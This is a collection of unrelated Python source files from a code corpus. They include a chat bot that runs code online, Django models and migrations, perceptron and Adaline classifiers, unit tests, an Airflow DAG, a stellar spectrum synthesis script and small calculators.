req).text res = res.split(res[:16])[1:] if match[0]: return ['Output:\n' + res[0], 'Debug:\n' + '\n'.join(res[1].splitlines()[:-6])] return 'Output:\n' + res[0] def list_languages(match, trigger): return ', '.join(LANGLIST) def search_languages(match, trigger): matches = [i for i in LANGLIST if match[0].lower() in i.lower()] if matches: return ', '.join(matches) else: return 'No languages matching {}. See !languages for a list of languages I support.'.format(match[0]) TIOBot = Bot( nick = 'TIOBot', room = 'xkcd', short_help = 'I allow easy execution of code online!', long_help = ('I allow easy execution of code online!\n' '\n' 'Commands:\n' ' !execute [-d|--debug] <language> -- <code> -> The STDOUT (and STDERR if the debug flag is enabled) output after' ' execution of <code> in <language>.\n' ' !languages -> List of languages that I support.\n' '\n' 'by totallyhuman\n' 'My source code is here: https://github.com/totallyhuman/TIOBot' ), generic_ping = 'Pong!', specific_ping = 'Pong!', regexes = { r'(?i)^\s*!execute(\s+(?:-d|--debug))?\s+(.+?)\s*--\s*([\s\S]+?)\s*$': execute, r'(?i)^\s*!languages\s*$': list_languages, r'(?i)^\s*!languages\s+(.+?)\s*$': search_languages } ) while True: TIOBot.receive()
StarcoderdataPython
56283
#!/usr/bin/python # -*- coding: utf-8 -*- # author arrti from ss_admin import app if __name__ == '__main__': app.run()
StarcoderdataPython
4817957
from django.db import models from accounts.models import CustomUser import datetime class Schedule(models.Model): summary = models.CharField("タイトル ※必須", max_length=25) date = models.DateField("日付 ※必須") place = models.CharField("場所", max_length=20, blank=True) time = models.TimeField("時間", blank=True, null=True) detail = models.TextField("詳細", blank=True) owner = models.ForeignKey(CustomUser, on_delete=models.CASCADE, related_name="Schedule_owner")
StarcoderdataPython
119462
""" Implements the Perception & Adaline Learning Algorithm Author: <NAME> Created: May 18, 2010 """ import numpy as np import matplotlib.pyplot as plt class Perception: """first artifical neural classifier Args: eta: Learning rate (between 0.0 and 1.0) n_iter: passees over the training set random_state: Random Number Generator seed for random weight initilization Attributes: w: Weights after fitting errors: Number of misclassifications(updates) in each epoch """ def __init__(self, eta: float = 0.01, n_iter: int = 50, random_state: int = 1): self.eta = eta self.n_iter = n_iter self.random_state = random_state def fit(self, X: np.ndarray, y: np.ndarray) -> 'Perception': """fits training data Args: X: shape = {n_samples, p_features} n_samples is number of instances i.e rows p_features is number of features (the dimension of dataset) y: shape = {n_samples, 1} Target values Returns: object """ # random number gen seed to reproduce values if needed rgen = np.random.RandomState(self.random_state) # initialize weights from normal distribution self.w = rgen.normal(loc=0.0, scale=0.01, size=1+X.shape[1]) self.errors = [] for _ in range(self.n_iter): errors = 0 # for each instance in training set for xi, target in zip(X, y): # calculate the weight update by perception rule delta_wj = self.eta * (target - self.predict(xi)) # update all weights simultaneously # given by wj := wj + delta_wj self.w[1:] += + delta_wj * xi # since x0 = 1 by construction self.w[0] += delta_wj # calculate number of misclassifications errors += int(delta_wj != 0) self.errors.append(errors) return self def net_input(self, X: np.ndarray) -> np.ndarray: """computes the net input vector z = w1x1 + w2x2 + ... + wpXp Args: X: shape = {n_samples, p_features} n_samples is # of instances p_features is number of features (dimension of dataset) Returns: z: shape = {n_samples, 1} net input vector """ return np.dot(X, self.w[1:]) + self.w[0] def predict(self, X: np.ndarray) -> float: """ computes the classifier phi(z) where phi(z) = 1 if z:= w'x >=0, -1 otherwise Args: X: shape {n_samples, p_features} Returns: classifier with value +1 or -1 """ return np.where(self.net_input(X) > 0, 1, -1) def plot_misclassifications(self) -> None: """plots the misclassifications given the number of epoochs requires to call the fit() first """ try: plt.plot(range(1, self.n_iter + 1), self.errors, marker='o'); plt.xlabel("epoch") plt.ylabel("# of misclassifications") except AttributeError as e: print("must call fit() first before plotting misclassifications") else: return class AdalineGD: """artificial neural classifier implemented with gradient descent Args: eta: Learning rate (between 0.0 and 1.0) n_iter: passees over the training set random_state: Random Number Generator seed for random weight initilization Attributes: w: Weights after fitting errors: Number of misclassifications(updates) in each epoch """ def __init__(self, eta: float = 0.01, n_iter: int = 50, random_state: int = 1): self.eta = eta self.n_iter = n_iter self.random_state = random_state def fit(self, X: np.ndarray, y: np.ndarray) -> 'AdalineGD': """fits training data Args: X: shape = {n_samples, p_features} n_samples is number of instances i.e rows p_features is number of features (the dimension of dataset) y: shape = {n_samples, 1} Target values Returns: object """ # random number gen seed to reproduce values if needed rgen = np.random.RandomState(self.random_state) # initialize weights from normal distribution self.w = rgen.normal(loc=0.0, scale=0.01, size=1+X.shape[1]) self.cost = [] for _ in range(self.n_iter): # calculate net input net_input = self.net_input(X) # calculate the linear activation function phi(z) = w'x = z output = self.activation(net_input) errors = y - output # update the weights self.w[1:] += eta * X.T.dot(errors) self.w[0] += eta * errors.sum() # sse based on J(w) = 1/2 sum(yi - yhat)**2 cost = (errors**2).sum() / 2.0 self.cost.append(cost) return self def net_input(self, X: np.ndarray) -> np.ndarray: """computes the net input vector z = w1x1 + w2x2 + ... + wpXp Args: X: shape = {n_samples, p_features} n_samples is # of instances p_features is number of features (dimension of dataset) Returns: z: shape = {n_samples, 1} net input vector """ return np.dot(X, self.w[1:]) + self.w[0] def activation(self, X: np.ndarray) -> np.ndarray: """compute linear activation z = w'x = phi(z) Args: X: shape = {n_samples, n_features} Returns: the input by itself """ return X def predict(self, X: np.ndarray) -> float: """ computes the classifier phi(z) where phi(z) = 1 if z:= w'x >=0, -1 otherwise Args: X: shape {n_samples, p_features} Returns: classifier with value +1 or -1 """ return np.where(self.activation(self.net_input(X)) > 0, 1, -1)
StarcoderdataPython
3289845
<reponame>StardustDL/Game.GoldenNumber def adjustNumberInRange(x: float) -> float: """Adjust number into range (0,100)""" if x <= 0: return 1e-12 if x >= 100: return 100 - 1e-12 return x
StarcoderdataPython
120032
from __future__ import division from datetime import timedelta, datetime, tzinfo if not hasattr(timedelta, 'total_seconds'): def total_seconds(td): "Return the total number of seconds contained in the duration for Python 2.6 and under." return (td.microseconds + (td.seconds + td.days * 86400) * 1e6) / 1e6 else: total_seconds = timedelta.total_seconds # Timezone related stuff # (mostly copied from https://github.com/django/django/blob/master/django/utils/timezone.py) try: from django.utils.timezone import now, get_current_timezone except ImportError: now = datetime.now get_current_timezone = lambda: None
StarcoderdataPython
74975
#Execution-3 from fake_news_detection_final_code import * # main function. def main(): Training_Validating('fake_news_dataset',130000,400,100,12,64,'x_test_3','y_test_3','history_3','model_3') Testing('x_test_3','y_test_3','history_3','model_3') ############################################# # utility function of main. if __name__ == '__main__': main()
StarcoderdataPython
87258
<reponame>icryrainix/odil<filename>tests/wrappers/webservices/test_message.py import unittest import odil class TestMessage(unittest.TestCase): def test_default_constructor(self): message = odil.webservices.Message() self.assertEqual(dict(message.get_headers()), {}) self.assertEqual(message.get_body(), "") def test_full_constructor(self): message = odil.webservices.Message(headers={"foo": "bar"}, body="body") self.assertEqual(dict(message.get_headers()), {"foo": "bar"}) self.assertEqual(message.get_body(), "body") def test_existing_header(self): message = odil.webservices.Message({"foo": "bar", "plip": "plop"}) self.assertTrue(message.has_header("foo")) self.assertEqual(message.get_header("foo"), "bar") def test_missing_header(self): message = odil.webservices.Message({"foo": "bar", "plip": "plop"}) self.assertFalse(message.has_header("none")) with self.assertRaises(odil.Exception): message.get_header("none") def test_set_headers(self): message = odil.webservices.Message() message.set_headers({"foo": "bar", "plip": "plop"}) self.assertEqual( dict(message.get_headers()), {"foo": "bar", "plip": "plop"}) def test_modify_header(self): message = odil.webservices.Message({"foo": "bar", "plip": "plop"}) message.set_header("foo", "baz") self.assertEqual(message.get_header("foo"), "baz") def test_add_header(self): message = odil.webservices.Message() message.set_header("foo", "baz") self.assertEqual(message.get_header("foo"), "baz") def test_body(self): message = odil.webservices.Message() message.set_body("body") self.assertEqual(message.get_body(), "body") if __name__ == "__main__": unittest.main()
StarcoderdataPython
3345423
# Copyright 2020 The Cirq Developers # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tools and methods for quantum information science.""" from cirq.qis.channels import ( kraus_to_channel_matrix, kraus_to_choi, operation_to_channel_matrix, operation_to_choi, ) from cirq.qis.clifford_tableau import CliffordTableau from cirq.qis.measures import ( fidelity, von_neumann_entropy, ) from cirq.qis.states import ( bloch_vector_from_state_vector, density_matrix, density_matrix_from_state_vector, dirac_notation, eye_tensor, infer_qid_shape, one_hot, QUANTUM_STATE_LIKE, QuantumState, quantum_state, STATE_VECTOR_LIKE, to_valid_density_matrix, to_valid_state_vector, validate_density_matrix, validate_indices, validate_qid_shape, validate_normalized_state_vector, )
StarcoderdataPython
136273
<filename>actingweb/__init__.py __all__ = ["actor", "oauth", "auth", "property", "trust", "config"]
StarcoderdataPython
3305884
<reponame>cclauss/4most-4gp-scripts<gh_stars>0 #!../../../../virtualenv/bin/python3 # -*- coding: utf-8 -*- # NB: The shebang line above assumes you've installed a python virtual environment alongside your working copy of the # <4most-4gp-scripts> git repository. It also only works if you invoke this python script from the directory where it # is located. If these two assumptions are incorrect (e.g. you're using Conda), you can still use this script by typing # <python synthesize_ges_dwarfs.py>, but <./synthesize_ges_dwarfs.py> will not work. """ Take stellar parameters of GES dwarf stars and synthesize spectra using TurboSpectrum. """ import json import logging import numpy as np from astropy.io import fits from lib.base_synthesizer import Synthesizer # List of elements whose abundances we pass to TurboSpectrum # Elements with neutral abundances, e.g. LI1 element_list = ( "He", "Li", "C", "O", "Ne", "Na", "Mg", "Al", "Si", "S", "Ca", "Sc", "Ti", "V", "Cr", "Mn", "Co", "Ni", "Cu", "Zn", "Sr", "Y", "Zr", "Nb", "Mo", "Ru") # Elements with ionised abundances, e.g. N2 element_list_ionised = ("N", "Ba", "La", "Ce", "Pr", "Nd", "Sm", "Eu", "Gd", "Dy") # Start logging our progress logging.basicConfig(level=logging.INFO, format='[%(asctime)s] %(levelname)s:%(filename)s:%(message)s', datefmt='%d/%m/%Y %H:%M:%S') logger = logging.getLogger(__name__) logger.info("Synthesizing GES dwarf spectra") # Instantiate base synthesizer synthesizer = Synthesizer(library_name="ges_dwarf_sample", logger=logger, docstring=__doc__) # Table supplies list of abundances for GES stars f = fits.open("../../downloads/GES_iDR5_WG15_Recommended.fits") ges = f[1].data ges_fields = ges.names # Obtain solar abundances, needed to convert values in file into solar units sun_id = np.where(ges.OBJECT == 'Sun_Benchmarks_BordeauxLib3 ')[0] # Filter objects on SNR min_SNR = 50 selection = np.where((ges.SNR > min_SNR) & (ges.REC_WG == 'WG11') & (ges.LOGG > 3.5))[0] stellar_data = ges[selection] # Loop over stars extracting stellar parameters from FITS file star_list = [] for star_index in range(len(stellar_data)): star_list_item = { "name": stellar_data.CNAME[star_index], "Teff": float(stellar_data.TEFF[star_index]), "[Fe/H]": float(stellar_data.FEH[star_index]), "logg": float(stellar_data.LOGG[star_index]), "extra_metadata": { "[alpha/Fe]": float(stellar_data.ALPHA_FE[star_index]) }, "free_abundances": {}, "input_data": {} } # Pass list of the abundances of individual elements to TurboSpectrum free_abundances = star_list_item["free_abundances"] for elements, ionisation_state in ((element_list, 1), (element_list_ionised, 2)): for element in elements: if (not synthesizer.args.elements) or (element in synthesizer.args.elements.split(",")): fits_field_name = "{}{}".format(element.upper(), ionisation_state) # Normalise abundance of element to solar abundance = stellar_data[fits_field_name][star_index] - ges[fits_field_name][sun_id] if np.isfinite(abundance): free_abundances[element] = float(abundance) # Propagate all ionisation states into metadata metadata = star_list_item["extra_metadata"] for element in element_list: abundances_all = [] for ionisation_state in range(1, 5): fits_field_name = "{}{}".format(element.upper(), ionisation_state) if fits_field_name in ges_fields: abundance = stellar_data[fits_field_name][star_index] - ges[fits_field_name][sun_id] abundances_all.append(float(abundance)) else: abundances_all.append(None) metadata["[{}/H]_ionised_states".format(element)] = json.dumps(abundances_all) # Propagate all input fields from the FITS file into <input_data> input_data = star_list_item["input_data"] for col_name in ges_fields: if col_name == "CNAME": continue value = stellar_data[col_name][star_index] if ges.dtype[col_name].type is np.string_: typed_value = str(value) else: typed_value = float(value) input_data[col_name] = typed_value star_list.append(star_list_item) # Pass list of stars to synthesizer synthesizer.set_star_list(star_list) # Output data into sqlite3 db synthesizer.dump_stellar_parameters_to_sqlite() # Create new SpectrumLibrary synthesizer.create_spectrum_library() # Iterate over the spectra we're supposed to be synthesizing synthesizer.do_synthesis() # Close TurboSpectrum synthesizer instance synthesizer.clean_up()
StarcoderdataPython
1766244
#crie um programa que leia quanto dinheiro uma pessoa tem na carteira e mostre quantos dolares ela pode comprar.$=3,27 Real = float(input('Quanto dinheiro você tem na carteira? R$')) Dolar = Real/3.27 print(f'Com R${Real:.2f} você pode comprar US${Dolar:.2f}')
StarcoderdataPython
136516
<gh_stars>0 from airflow import DAG from airflow.operators.bash_operator import BashOperator from airflow.operators.python_operator import PythonOperator from datetime import datetime, timedelta default_args = { 'owner': 'airflow', 'description': 'Wikipedia assistant', 'depends_on_past': False, 'start_date': datetime(2020, 7, 28), 'email': ['<EMAIL>'], 'email_on_failure': False, 'email_on_retry': False, 'retries': 1, 'retry_delay': timedelta(minutes=5) } dag = DAG( 'Wiki_Analyzer', default_args=default_args, schedule_interval=timedelta(days=20)) def validate_connections(): print("Connections validation code goes here") validate_connectivity = PythonOperator( task_id='validate_connectivity', provide_context=True, python_callable=validate_connections, dag=dag, ) extract_wiki_data = BashOperator( task_id='extract_wiki_data', bash_command='docker run --network=host -v $(pwd):/job godatadriven/pyspark --name "Wiki Extractor" --master "local[1]" --conf "spark.ui.showConsoleProgress=True" --jars /job/libs/* --conf spark.cassandra.connection.host=localhost /job/code/spark_reader_server.py', dag=dag, ) validate_connectivity >> extract_wiki_data
StarcoderdataPython
4810811
# -*- coding: utf-8 -*- # Generated by Django 1.11.4 on 2017-09-12 03:42 from __future__ import unicode_literals import django.db.models.deletion from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('swot_item', '0003_auto_20170912_0321'), ] operations = [ migrations.CreateModel( name='UpVote', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('created', models.DateTimeField(auto_now_add=True)), ], ), migrations.RenameModel( old_name='SwotItem', new_name='Item', ), migrations.AddField( model_name='upvote', name='item', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='swot_item.Item'), ), ]
StarcoderdataPython
73989
<reponame>matheusmiguelsa/Exerc-cios-de-Python<gh_stars>0 v = float(input('Valor da casa a ser comprada: R$')) s = float(input('Salário do comprador: R$')) qa = float(input('Quantos anos irá pagar: ')) print('Para pagar uma casa de R${:.2f} em {:.0f} anos'.format(v, qa), end='') print(' a prestação sera de R${:.2f}'.format(v / (qa * 12))) if v / (qa* 12) >= s * 0.3: print('Seu empréstimo foi negado, sinto muito') else: print('Seu empréstimo foi aprovado, parabéns!!')
StarcoderdataPython